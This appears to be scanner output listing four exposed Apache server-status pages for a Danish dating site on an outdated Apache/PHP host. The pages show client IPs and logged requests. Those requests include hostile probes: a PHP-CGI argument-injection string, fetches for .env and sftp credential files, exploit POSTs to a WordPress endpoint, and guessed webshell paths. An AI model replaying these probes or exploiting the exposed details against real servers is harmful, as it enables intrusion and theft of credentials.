172.70.35.3webhotel5.webhosting.dkindex.php?threads/hj%C3%A6lper-p%C3%A5-opprison2.1018/ HTTP/1.0 50-0-0/0/50. 0.09967300.00.000.01 64.124.8.1webhotel5.webhosting.dkGET /torben/
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31d7effde3d7effde3facec994
Apache Status Apache Server Status for www.go4love.dk Server Version: Apache/2.2.34 (Unix) PHP/5.2.17 Server Built: Oct 8 2019 02:07:04 Current Time: Sunday, 06-Oct-2024 13:50:47 CEST Restart Time: Sunday, 06-Oct-2024 06:05:05 CEST Parent Server Generation: 7 Server uptime: 7 hours 45 minutes 41 seconds Total accesses: 49999 - Total Traffic: 20.6 MB CPU Usage: u1.72 s1.16 cu0 cs0 - .0103% CPU load 1.79 requests/sec - 773 B/second - 432 B/request 1 requests currently being processed, 30 idle workers _W___________________________._._............................... ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqConnChildSlotClientVHostRequest 0-7611700/16/1541_ 0.06190.00.010.56 159.89.12.166webhotel5.webhosting.dkGET / HTTP/1.0 1-7611770/15/1537W 0.04000.00.010.55 159.89.12.166webhotel5.webhosting.dkGET /server-status HTTP/1.0 2-7621670/9/1574_ 0.02360.00.000.85 72.13.62.43webhotel5.webhosting.dkGET / HTTP/1.0 3-7622010/8/1472_ 0.016200.00.000.50 93.235.159.64webhotel5.webhosting.dkGET /min-side/log-ind.aspx HTTP/1.0 4-7622020/8/1512_ 0.035910.00.000.50 50.3.164.135webhotel5.webhosting.dkGET /kontakt-os/ HTTP/1.0 5-7622070/8/1412_ 0.025960.00.000.49 196.247.168.131webhotel5.webhosting.dkGET / HTTP/1.0 6-7622080/8/1422_ 0.014600.00.000.59 81.33.134.31webhotel5.webhosting.dkGET /min-side/log-ind.aspx HTTP/1.0 7-7632200/5/1416_ 0.00300.00.000.58 74.82.0.109webhotel5.webhosting.dkGET /min-side/log-ind.aspx HTTP/1.0 8-7632210/5/1426_ 0.02000.00.000.43 159.89.12.166webhotel5.webhosting.dkGET /server HTTP/1.0 9-7632220/5/1404_ 0.00010.00.000.53 159.89.12.166webhotel5.webhosting.dkGET /.vscode/sftp.json HTTP/1.0 10-7632240/5/1410_ 0.01000.00.000.82 159.89.12.166webhotel5.webhosting.dkGET /debug/default/view?panel=config HTTP/1.0 11-7632250/5/1360_ 0.03000.00.000.44 159.89.12.166webhotel5.webhosting.dkGET /about HTTP/1.0 12-7632260/5/1408_ 0.01010.00.000.47 159.89.12.166webhotel5.webhosting.dkGET /v2/_catalog HTTP/1.0 13-7632270/5/1380_ 0.00020.00.001.15 159.89.12.166webhotel5.webhosting.dkl/microsoft.exchange.ediscovery.exporttool.application HTTP/1.0 14-7639670/3/1396_ 0.015960.00.000.47 50.3.164.135webhotel5.webhosting.dkGET / HTTP/1.0 15-7639680/3/1405_ 0.005410.00.000.55 47.128.18.193webhotel5.webhosting.dkE2%98%85%E2%98%85%E2%98%85%E2%98%85%E2%9C%A9%E2%9C%A9/ HTTP/1.0 16-7640120/3/1301_ 0.02361210.00.000.63 69.162.124.228webhotel5.webhosting.dkHEAD / HTTP/1.0 17-7639690/3/1324_ 0.004700.00.000.67 209.127.130.45webhotel5.webhosting.dkGET /min-side/log-ind.aspx HTTP/1.0 18-7640420/3/1256_ 0.003000.00.000.72 47.128.61.78webhotel5.webhosting.dkGET /3888/karl-william-livet-faldet-alt-det-andet/ HTTP/1.0 19-7640430/3/1352_ 0.003470.00.000.53 170.106.180.246webhotel5.webhosting.dkGET / HTTP/1.0 20-7640440/3/1296_ 0.001580.00.000.52 81.19.232.89webhotel5.webhosting.dkGET / HTTP/1.0 21-7640500/3/1246_ 0.001510.00.000.79 40.77.167.56webhotel5.webhosting.dkGET /resultater/ HTTP/1.0 22-7640510/3/1272_ 0.001000.00.000.52 40.77.167.24webhotel5.webhosting.dkU2VhcmNoSm9iUXVlcnlEZXNjcmlwdGlvbiZ2aWV3ZWRmcm9tPTE%3D HTTP/1.0 23-7640520/3/1221_ 0.001000.00.000.49 31.13.224.133webhotel5.webhosting.dkGET /min-side/log-ind.aspx HTTP/1.0 24-7641020/3/1173_ 0.0161070.00.000.38 129.226.213.145webhotel5.webhosting.dkGET / HTTP/1.0 25-7641270/3/1215_ 0.00400.00.000.45 72.13.62.43webhotel5.webhosting.dkGET /robots.txt HTTP/1.0 26-7641280/3/1260_ 0.01070.00.000.70 159.89.12.166webhotel5.webhosting.dkGET / HTTP/1.0 27-7641290/3/1073_ 0.00000.00.000.36 159.89.12.166webhotel5.webhosting.dkw_url_include%3D1+%ADd+auto_prepend_file%3Dphp://input HTTP/1.0 28-7649480/0/1030_ 0.12610.00.000.34 82.167.124.112webhotel5.webhosting.dkGET /.env HTTP/1.0 29-7-0/0/1130. 0.1111800.00.000.36 82.167.124.112webhotel5.webhosting.dkGET /conf/.env HTTP/1.0 30-7622090/8/1072_ 0.014280.00.000.40 13.36.237.244webhotel5.webhosting.dkGET / HTTP/1.0 31-7-0/0/1055. 0.1211700.00.000.44 40.77.167.76webhotel5.webhosting.dkGET /sitemap.xml HTTP/1.0 32-7622100/8/863_ 0.014210.00.000.36 213.153.89.7webhotel5.webhosting.dkGET /min-side/log-ind.aspx HTTP/1.0 33-7-0/0/605. 0.08179800.00.000.31 185.104.184.206webhotel5.webhosting.dkGET /wp-content/plugins/random/ HTTP/1.0 34-7-0/0/607. 0.08179800.00.000.29 185.104.184.206webhotel5.webhosting.dkGET /wp-content/plugins/ubh/ HTTP/1.0 35-7-0/0/507. 0.09179810.00.000.22 185.104.184.206webhotel5.webhosting.dkGET /wp-content/plugins/wp-diambar/includes/ HTTP/1.0 36-7-0/0/505. 0.07179700.00.000.18 89.248.163.208webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 37-7-0/0/453. 0.08179700.00.000.14 185.104.184.206webhotel5.webhosting.dkGET /wp-content/plugins/wp-freeform/ HTTP/1.0 38-7-0/0/318. 0.09179300.00.000.09 185.104.184.206webhotel5.webhosting.dkGET /WordPress/wp-admin/includes/ HTTP/1.0 39-7-0/0/318. 0.08180600.00.000.10 185.104.184.206webhotel5.webhosting.dkGET /wp-includes/images/wlw/ HTTP/1.0 40-7-0/0/268. 0.08179700.00.000.08 185.104.184.206webhotel5.webhosting.dkGET /wp-content/plugins/core-stab/ HTTP/1.0 41-7-0/0/218. 0.08179300.00.000.13 185.104.184.206webhotel5.webhosting.dkGET /public/wp-includes/css/dist/editor/ HTTP/1.0 42-7-0/0/218. 0.09180500.00.000.06 185.104.184.206webhotel5.webhosting.dkGET /wp-includes/sitemaps/providers/ HTTP/1.0 43-7-0/0/218. 0.07179300.00.000.06 66.249.66.206webhotel5.webhosting.dk.php?uid=6529&p=826&barWidth=200&hsid=6393021999392658 HTTP/1.0 44-7-0/0/200. 0.08179600.00.000.06 185.104.184.206webhotel5.webhosting.dkGET /wp-content/themes/rishi/ HTTP/1.0 45-7-0/0/200. 0.09179600.00.000.06 185.104.184.206webhotel5.webhosting.dkGET /wp-content/themes/sketch/ HTTP/1.0 46-7-0/0/200. 0.07179600.00.000.06 185.104.184.206webhotel5.webhosting.dkGET /wp-content/themes/thuoc-nam/ HTTP/1.0 47-7-0/0/200. 0.08179200.00.000.06 185.104.184.206webhotel5.webhosting.dkGET /css/assets/ HTTP/1.0 48-7-0/0/150. 0.07179600.00.000.04 185.104.184.206webhotel5.webhosting.dkGET /wp-content/themes/wp-pridmag/ HTTP/1.0 49-7-0/0/150. 0.09179400.00.000.04 185.104.184.206webhotel5.webhosting.dkGET /admin/upload/ HTTP/1.0 50-7-0/0/
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31d7effde3d7effde3ca1d98b6
Apache Status Apache Server Status for www.go4love.dk Server Version: Apache/2.2.34 (Unix) PHP/5.2.17 Server Built: Oct 8 2019 02:07:04 Current Time: Friday, 04-Oct-2024 12:09:52 CEST Restart Time: Friday, 04-Oct-2024 06:05:05 CEST Parent Server Generation: 6 Server uptime: 6 hours 4 minutes 47 seconds Total accesses: 24843 - Total Traffic: 29.1 MB CPU Usage: u1.69 s.85 cu0 cs0 - .0116% CPU load 1.14 requests/sec - 1393 B/second - 1228 B/request 1 requests currently being processed, 30 idle workers ______________W________________................................. ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqConnChildSlotClientVHostRequest 0-6339210/10/798_ 0.013800.00.010.48 54.36.148.149webhotel5.webhosting.dkGET /robots.txt HTTP/1.0 1-6339310/9/787_ 0.02800.00.000.35 94.102.51.95webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 2-6339220/9/798_ 0.023200.00.000.32 94.102.51.95webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 3-6339230/9/777_ 0.052150.00.000.69 81.19.232.89webhotel5.webhosting.dkGET / HTTP/1.0 4-6339270/9/775_ 0.011400.00.030.61 47.128.45.141webhotel5.webhosting.dksue_3_2012&p=smartViewer&page=172&publicationName=temp HTTP/1.0 5-6339300/9/776_ 0.02900.00.000.51 119.93.149.98webhotel5.webhosting.dkGET /min-side/log-ind.aspx HTTP/1.0 6-6339240/9/773_ 0.022050.00.000.55 43.134.190.89webhotel5.webhosting.dkGET / HTTP/1.0 7-6339280/9/766_ 0.021090.00.000.54 164.92.107.174webhotel5.webhosting.dkGET / HTTP/1.0 8-6339390/9/764_ 0.01000.00.170.52 164.92.107.174webhotel5.webhosting.dkl/microsoft.exchange.ediscovery.exporttool.application HTTP/1.0 9-6339380/9/767_ 0.03110.00.000.67 164.92.107.174webhotel5.webhosting.dkGET /v2/_catalog HTTP/1.0 10-6339370/9/767_ 0.02100.00.000.55 164.92.107.174webhotel5.webhosting.dkGET /debug/default/view?panel=config HTTP/1.0 11-6339320/9/764_ 0.01700.00.002.52 185.211.58.110webhotel5.webhosting.dkGET /min-side/log-ind.aspx HTTP/1.0 12-6339490/8/761_ 0.033900.00.010.57 93.107.227.139webhotel5.webhosting.dkGET /min-side/log-ind.aspx HTTP/1.0 13-6339330/9/762_ 0.04560.00.000.68 164.92.107.174webhotel5.webhosting.dkGET / HTTP/1.0 14-6339400/8/755W 0.01000.00.000.67 164.92.107.174webhotel5.webhosting.dkGET /server-status HTTP/1.0 15-6339340/9/763_ 0.03300.00.000.48 164.92.107.174webhotel5.webhosting.dkGET /server HTTP/1.0 16-6339350/9/763_ 0.03410.00.000.70 164.92.107.174webhotel5.webhosting.dkw_url_include%3D1+%ADd+auto_prepend_file%3Dphp://input HTTP/1.0 17-6339360/9/711_ 0.02300.00.090.77 164.92.107.174webhotel5.webhosting.dkGET /.vscode/sftp.json HTTP/1.0 18-6339540/8/758_ 0.003900.00.001.07 85.208.96.212webhotel5.webhosting.dkGET /robots.txt HTTP/1.0 19-6339570/8/763_ 0.023800.00.011.02 85.208.96.210webhotel5.webhosting.dkGET /shop/368-style-trendz-stroempepinde/ HTTP/1.0 20-6339580/8/757_ 0.0330340.00.220.51 81.19.232.105www.sydsjaellandsgarderforeningGET /pdf/gb_23_12.pdf HTTP/1.0 21-6339670/8/659_ 0.022900.00.122.43 94.102.51.95webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 22-6339690/8/656_ 0.0329350.00.211.11 81.19.232.105www.sydsjaellandsgarderforeningGET /pdf/gb_23_1.pdf HTTP/1.0 23-6339800/8/655_ 0.0327100.00.010.38 50.16.173.147webhotel5.webhosting.dkGET / HTTP/1.0 24-6339870/7/654_ 0.022400.00.000.82 54.36.148.132webhotel5.webhosting.dkGET /robots.txt HTTP/1.0 25-6340010/8/655_ 0.032360.00.001.09 194.67.210.77webhotel5.webhosting.dkHEAD / HTTP/1.0 26-6340160/8/647_ 0.022170.00.000.27 194.67.207.55webhotel5.webhosting.dkHEAD / HTTP/1.0 27-6357780/7/595_ 0.01210.00.000.37 164.92.107.174webhotel5.webhosting.dkGET /about HTTP/1.0 28-6339250/9/580_ 0.041700.00.000.47 94.102.51.95webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 29-6339260/9/514_ 0.041200.00.000.26 94.102.51.95webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 30-6339290/9/511_ 0.0210330.00.130.48 185.191.171.9www.tutak.dkGET /NAVWEB/plc/d/0/dccb8a085ffbd3bbecea6ced0d.html HTTP/1.0 31-5-0/0/539. 0.0958800.00.000.87 ::1webhotel5-64bit.webhosting.dkOPTIONS * HTTP/1.0 32-5-0/0/298. 0.1313351450.00.000.82 34.127.42.232webhotel5.webhosting.dkGET / HTTP/1.0 33-5-0/0/297. 0.171343230.00.000.26 81.19.232.105www.sydsjaellandsgarderforeningGET /pdf/gb_24_3.pdf HTTP/1.0 34-3-0/0/216. 0.11872200.00.001.02 52.178.178.162webhotel5.webhosting.dkGET /wp-content/uploads/upload_handler.php HTTP/1.0 35-3-0/0/152. 0.11872200.00.000.21 52.178.178.162webhotel5.webhosting.dkGET /cgi-bin/cloud.php HTTP/1.0 36-3-0/0/152. 0.12872200.00.002.59 52.178.178.162webhotel5.webhosting.dkGET /defense.php HTTP/1.0 37-3-0/0/152. 0.10872200.00.000.07 52.178.178.162webhotel5.webhosting.dkGET /profile.php HTTP/1.0 38-3-0/0/152. 0.11872200.00.000.23 52.178.178.162webhotel5.webhosting.dkGET /wp-admin/user/themes.php HTTP/1.0 39-3-0/0/152. 0.11872200.00.000.16 52.178.178.162webhotel5.webhosting.dkGET /filemanager/dialog.php HTTP/1.0 40-3-0/0/152. 0.10872200.00.000.04 52.178.178.162webhotel5.webhosting.dkGET /images/about.php HTTP/1.0 41-3-0/0/100. 0.12872200.00.000.09 52.178.178.162webhotel5.webhosting.dkGET /moon.php?p= HTTP/1.0 42-3-0/0/50. 0.13872200.00.000.05 52.178.178.162webhotel5.webhosting.dkGET /wp-includes/js/jquery/jquery.js HTTP/1.0 43-3-0/0/50. 0.11872200.00.000.04 52.178.178.162webhotel5.webhosting.dkGET /tools.php HTTP/1.0 44-3-0/0/50. 0.12872200.00.000.02 52.178.178.162webhotel5.webhosting.dkGET /.well-known/pki-validation/cloud.php HTTP/1.0 45-3-0/0/50. 0.09872210.00.000.06 52.178.178.162webhotel5.webhosting.dkGET /bak.php HTTP/1.0 46-3-0/0/50. 0.11872200.00.000.12 52.178.178.162webhotel5.webhosting.dkGET /assets/images/ups.php HTTP/1.0 SrvChild Server number - generation PIDOS process ID AccNumber of accesses this connection / this child / this slot MMode of operation CPUCPU usage, number of seconds SSSeconds since beginning of most recent request ReqMilliseconds required to process most recent request ConnKilobytes transferred this connection ChildMegabytes transferred this child SlotTotal megabytes transferred this slot Apache Server at www.go4love.dk Port 443
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31d7effde3d7effde3eb0ac924
Apache Status Apache Server Status for www.go4love.dk Server Version: Apache/2.2.34 (Unix) PHP/5.2.17 Server Built: Oct 8 2019 02:07:04 Current Time: Wednesday, 02-Oct-2024 07:47:46 CEST Restart Time: Wednesday, 02-Oct-2024 06:05:04 CEST Parent Server Generation: 1 Server uptime: 1 hour 42 minutes 42 seconds Total accesses: 9876 - Total Traffic: 3.2 MB CPU Usage: u1.82 s1.02 cu0 cs0 - .0461% CPU load 1.6 requests/sec - 551 B/second - 344 B/request 1 requests currently being processed, 29 idle workers __W.___________________________................................. ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqConnChildSlotClientVHostRequest 0-1183430/43/339_ 0.09000.00.010.14 94.102.51.95webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 1-1233630/2/335_ 0.00000.00.000.10 68.183.9.16webhotel5.webhosting.dkGET /debug/default/view?panel=config HTTP/1.0 2-1233270/2/335W 0.00000.00.000.14 68.183.9.16webhotel5.webhosting.dkGET /server-status HTTP/1.0 3-1-0/0/318. 0.103600.00.000.08 94.102.51.95webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 4-1183440/43/311_ 0.08000.00.010.16 68.183.9.16webhotel5.webhosting.dkGET /v2/_catalog HTTP/1.0 5-1183450/42/309_ 0.08000.00.010.15 68.183.9.16webhotel5.webhosting.dkGET /about HTTP/1.0 6-1183460/42/310_ 0.08000.00.010.09 94.102.51.95webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 7-1183470/38/306_ 0.08000.00.010.08 68.183.9.16webhotel5.webhosting.dkl/microsoft.exchange.ediscovery.exporttool.application HTTP/1.0 8-1183480/38/306_ 0.06000.00.010.15 94.102.51.95webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 9-1183490/37/305_ 0.06500.00.010.08 167.71.223.167webhotel5.webhosting.dkGET /blog/wp-includes/wlwmanifest.xml HTTP/1.0 10-1183500/37/304_ 0.08500.00.010.08 167.71.223.167webhotel5.webhosting.dkGET /web/wp-includes/wlwmanifest.xml HTTP/1.0 11-1183510/37/303_ 0.07500.00.010.09 216.244.66.245webhotel5.webhosting.dklists%2Foverview%3FaddNewListItem%3D689&content_only=1 HTTP/1.0 12-1183520/37/304_ 0.07500.00.010.10 167.71.223.167webhotel5.webhosting.dkGET /wordpress/wp-includes/wlwmanifest.xml HTTP/1.0 13-1183530/37/304_ 0.07400.00.010.08 167.71.223.167webhotel5.webhosting.dkGET /wp/wp-includes/wlwmanifest.xml HTTP/1.0 14-1183540/37/304_ 0.09300.00.010.08 167.71.223.167webhotel5.webhosting.dkGET /test/wp-includes/wlwmanifest.xml HTTP/1.0 15-1183570/35/301_ 0.08410.00.010.08 167.71.223.167webhotel5.webhosting.dkGET /2020/wp-includes/wlwmanifest.xml HTTP/1.0 16-1183580/35/302_ 0.08400.00.010.13 167.71.223.167webhotel5.webhosting.dkGET /2019/wp-includes/wlwmanifest.xml HTTP/1.0 17-1183590/35/302_ 0.07310.00.010.09 167.71.223.167webhotel5.webhosting.dkGET /2021/wp-includes/wlwmanifest.xml HTTP/1.0 18-1183600/35/251_ 0.06300.00.010.06 216.244.66.245webhotel5.webhosting.dklists%2Foverview%3FaddNewListItem%3D785&content_only=1 HTTP/1.0 19-1183610/35/251_ 0.06200.00.010.08 167.71.223.167webhotel5.webhosting.dkGET /site/wp-includes/wlwmanifest.xml HTTP/1.0 20-1183620/35/252_ 0.06300.00.010.08 167.71.223.167webhotel5.webhosting.dkGET /shop/wp-includes/wlwmanifest.xml HTTP/1.0 21-1183630/35/310_ 0.07300.00.010.16 167.71.223.167webhotel5.webhosting.dkGET /wp1/wp-includes/wlwmanifest.xml HTTP/1.0 22-1183640/35/251_ 0.07200.00.010.07 167.71.223.167webhotel5.webhosting.dkGET /cms/wp-includes/wlwmanifest.xml HTTP/1.0 23-1183650/35/252_ 0.05200.00.010.08 216.244.66.245webhotel5.webhosting.dkemilla-100-okologisk-uld%2F496-semilla-lys-grabla.html HTTP/1.0 24-1183660/35/251_ 0.07160.00.010.08 68.183.9.16webhotel5.webhosting.dkGET / HTTP/1.0 25-1183670/35/310_ 0.07100.00.010.09 216.244.66.245webhotel5.webhosting.dkuld%2F21-yorkshire-naturfarvet.html%3Fcontent_only%3D1 HTTP/1.0 26-1183680/35/251_ 0.06060.00.010.06 68.183.9.16webhotel5.webhosting.dkGET / HTTP/1.0 27-1183690/35/251_ 0.06000.00.010.07 68.183.9.16webhotel5.webhosting.dkw_url_include%3D1+%ADd+auto_prepend_file%3Dphp://input HTTP/1.0 28-1183700/34/249_ 0.06010.00.010.10 68.183.9.16webhotel5.webhosting.dkGET /server HTTP/1.0 29-1183710/35/235_ 0.07000.00.010.06 94.102.51.95webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 30-1183720/35/235_ 0.07000.00.010.07 68.183.9.16webhotel5.webhosting.dkGET /.vscode/sftp.json HTTP/1.0 31-1-0/0/231. 0.0967700.00.000.06 13.74.98.109webhotel5.webhosting.dkGET /wp-includes/makeasmtp.php HTTP/1.0 32-1-0/0/224. 0.1067700.00.000.06 13.74.98.109webhotel5.webhosting.dkGET /wp-admin/user/index.php HTTP/1.0 33-1-0/0/175. 0.102010100.00.000.06 205.210.31.101webhotel5.webhosting.dkGET / HTTP/1.0 34-1-0/0/100. 0.10200600.00.000.03 202.78.28.21webhotel5.webhosting.dkGET /min-side/log-ind.aspx HTTP/1.0 35-1-0/0/50. 0.10200050.00.000.01 173.38.117.78webhotel5.webhosting.dkGET / HTTP/1.0 36-1-0/0/50. 0.09200800.00.000.01 165.73.53.13webhotel5.webhosting.dkGET /min-side/log-ind.aspx HTTP/1.0 37-1-0/0/50. 0.09199410.00.000.01 81.19.232.89webhotel5.webhosting.dkGET / HTTP/1.0 38-1-0/0/49. 0.10198900.00.000.01 127.0.0.1webhotel5.webhosting.dkGET / HTTP/1.0 SrvChild Server number - generation PIDOS process ID AccNumber of accesses this connection / this child / this slot MMode of operation CPUCPU usage, number of seconds SSSeconds since beginning of most recent request ReqMilliseconds required to process most recent request ConnKilobytes transferred this connection ChildMegabytes transferred this child SlotTotal megabytes transferred this slot Apache Server at www.go4love.dk Port 443
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31d7effde3d7effde30e56f72a
Apache Status Apache Server Status for www.go4love.dk Server Version: Apache/2.2.34 (Unix) PHP/5.2.17 Server Built: Oct 8 2019 02:07:04 Current Time: Monday, 30-Sep-2024 05:56:56 CEST Restart Time: Monday, 30-Sep-2024 04:00:12 CEST Parent Server Generation: 1 Server uptime: 1 hour 56 minutes 43 seconds Total accesses: 9856 - Total Traffic: 3.5 MB CPU Usage: u3.07 s1.7 cu0 cs0 - .0681% CPU load 1.41 requests/sec - 522 B/second - 371 B/request 1 requests currently being processed, 30 idle workers ___.....__.__._______________W_._______......................... ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqConnChildSlotClientVHostRequest 0-1307030/0/302_ 0.16100.00.000.16 94.102.51.95webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 1-1307230/0/302_ 0.11010.00.000.08 94.102.51.95webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 2-1307240/0/302_ 0.14000.00.000.08 94.102.51.95webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 3-1-0/0/301. 0.103100.00.000.11 89.248.163.130webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 4-1-0/0/302. 0.10200.00.000.12 94.102.51.95webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 5-1-0/0/302. 0.111100.00.000.09 139.59.136.184webhotel5.webhosting.dkGET / HTTP/1.0 6-1-0/0/302. 0.13080.00.000.24 139.59.136.184webhotel5.webhosting.dkGET / HTTP/1.0 7-1-0/0/251. 0.107900.00.000.08 94.102.51.95webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 8-1180870/49/301_ 0.102720.00.010.08 81.19.232.89webhotel5.webhosting.dkGET / HTTP/1.0 9-1180880/48/300_ 0.102500.00.030.10 94.102.51.95webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 10-1-0/0/301. 0.127400.00.000.08 94.102.51.95webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 11-1180890/49/301_ 0.11231600.00.020.10 69.162.124.228webhotel5.webhosting.dkHEAD / HTTP/1.0 12-1180900/48/300_ 0.112410.00.020.10 159.118.139.98webhotel5.webhosting.dkGET /min-side/log-ind.aspx HTTP/1.0 13-1-0/0/302. 0.137700.00.000.10 94.102.51.95webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 14-1180920/49/301_ 0.122100.00.010.09 94.102.51.95webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 15-1180930/48/250_ 0.121510.00.010.16 94.102.51.95webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 16-1180940/49/301_ 0.10930.00.090.17 15.235.15.135www.tutak.dkGET / HTTP/1.0 17-1180950/49/251_ 0.121140.00.020.08 54.36.148.138www.tutak.dkT /volga/volga/volga2/slides/101%20Frilandsmuseum.html HTTP/1.0 18-1180960/49/251_ 0.10800.00.020.08 94.102.51.95webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 19-1180970/49/251_ 0.12400.00.010.07 94.102.51.95webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 20-1180980/49/250_ 0.12400.00.010.08 94.102.51.95webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 21-1180990/49/250_ 0.09400.00.010.07 94.102.51.95webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 22-1181010/49/249_ 0.12010.00.010.08 139.59.136.184webhotel5.webhosting.dkw_url_include%3D1+%ADd+auto_prepend_file%3Dphp://input HTTP/1.0 23-1181020/49/250_ 0.09000.00.010.06 139.59.136.184webhotel5.webhosting.dkGET /about HTTP/1.0 24-1181030/49/249_ 0.12000.00.020.08 139.59.136.184webhotel5.webhosting.dkGET /server HTTP/1.0 25-1181040/49/250_ 0.11010.00.010.08 139.59.136.184webhotel5.webhosting.dkGET /debug/default/view?panel=config HTTP/1.0 26-1181050/49/250_ 0.11000.00.010.09 139.59.136.184webhotel5.webhosting.dkGET /.vscode/sftp.json HTTP/1.0 27-1181060/49/250_ 0.10000.00.020.08 139.59.136.184webhotel5.webhosting.dkGET /v2/_catalog HTTP/1.0 28-1181070/49/250_ 0.10000.00.010.11 139.59.136.184webhotel5.webhosting.dkl/microsoft.exchange.ediscovery.exporttool.application HTTP/1.0 29-1181080/48/248W 0.12000.00.010.07 139.59.136.184webhotel5.webhosting.dkGET /server-status HTTP/1.0 30-1181090/49/299_ 0.126000.00.020.09 154.207.163.126webhotel5.webhosting.dkmonica-breitenstein-psykoterapeut-stege_profilfoto.jpg HTTP/1.0 31-1-0/0/202. 0.08157200.00.000.06 213.199.52.248webhotel5.webhosting.dkGET /wp-includes/media-template.php HTTP/1.0 32-1181100/47/147_ 0.116100.00.010.04 154.207.163.126webhotel5.webhosting.dkmonica-breitenstein-psykoterapeut-stege_profilfoto.jpg HTTP/1.0 33-1181110/48/148_ 0.095300.00.010.04 37.139.53.191webhotel5.webhosting.dkPOST /formmail/formmail.php HTTP/1.0 34-1181120/48/148_ 0.114500.00.010.04 94.102.51.95webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 35-1181130/48/98_ 0.114300.00.020.03 94.102.51.95webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 36-1181140/49/99_ 0.093800.00.010.03 95.108.213.198webhotel5.webhosting.dkextra-fine-merino-/3659-120-extrafine-merino---fv-282/ HTTP/1.0 37-1181150/47/97_ 0.103810.00.030.04 95.108.213.157webhotel5.webhosting.dkGET /robots.txt HTTP/1.0 38-1181160/48/98_ 0.133600.00.010.03 89.248.163.130webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 39-1-0/0/50. 0.10177600.00.000.01 149.88.106.166webhotel5.webhosting.dkGET /wp-admin/xmrlpc.php?p= HTTP/1.0 40-1-0/0/50. 0.09177600.00.000.03 213.199.52.248webhotel5.webhosting.dkGET /bs.php HTTP/1.0 41-1-0/0/50. 0.08177600.00.000.01 149.88.106.166webhotel5.webhosting.dkGET /wp-content/plugins/fix/1.php HTTP/1.0 42-1-0/0/50. 0.09177600.00.000.01 